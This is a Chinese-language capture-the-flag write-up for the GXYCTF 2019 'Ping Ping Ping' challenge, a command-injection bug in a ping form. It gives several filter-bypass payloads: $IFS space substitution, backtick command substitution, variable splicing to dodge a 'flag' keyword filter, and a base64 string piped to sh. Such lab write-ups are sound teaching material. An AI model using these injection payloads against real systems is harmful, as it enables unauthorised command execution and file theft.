[GXYCTF 2019]Ping Ping Ping

[GXYCTF 2019]Ping Ping Ping wp

关于命令执行相关知识可以看这篇博客：

CTFping命令绕过及符号用法

本文只写做题流程及几种解法。

信息搜集

页面：

毫无疑问，这是一道 ping 命令执行的题。

简单测试一下

127.0.0.1;ls

返回：

说明存在命令执行，且分号没被过滤。

获取 flag

简单测试一下，就会发现过滤了很多东西，比如空格，大括号，“flag” 字符串等等。

用 $IFS$9 代替空格查看一下 index.php 文件内容：

;cat$IFS$9index.php

那么就可以构造以下几种 payload ：

payload1：反引号命令执行

;cat$IFS$9`ls`

反引号内的内容会先被当成命令执行，再将执行结果作为外部命令的一部分再去执行。

在这里就是先执行 ls ，结果为 index.php flag.php ，再 cat 查看这些文件。其作用等同于 cat * 查看当前目录下所有文件，但是 ‘*’ 被过滤了。

payload2：变量赋值再使用

;b=ag;a=fl;cat$IFS$1$a$b.php

意思就是将 “ag” 赋值给变量 b ，将 “fl” 赋值给变量 a ，最后拼接起来，$a$b 就是 “flag” ，这样就绕过了对 “flag” 字符串的检测。

$IFS$1 也是用于替换空格。

payload3：base64 编码

;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

其中 Y2F0IGZsYWcucGhw 就是 cat flag.php 的 base64 编码。

“|” 是管道符，将上一条命令输出的结果作为下一条命令的输入。

base64 -d 是 Linux 中用于将字符串进行 base64 解码的命令。

sh 用于执行 shell 命令。

以此方式达成用 sh 命令执行 cat flag.php 的效果。

其实与之相似的 payload 还有：

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash

但是 bash 被过滤了。

flag 在源码里

执行以上命令后，去源码里找 flag ：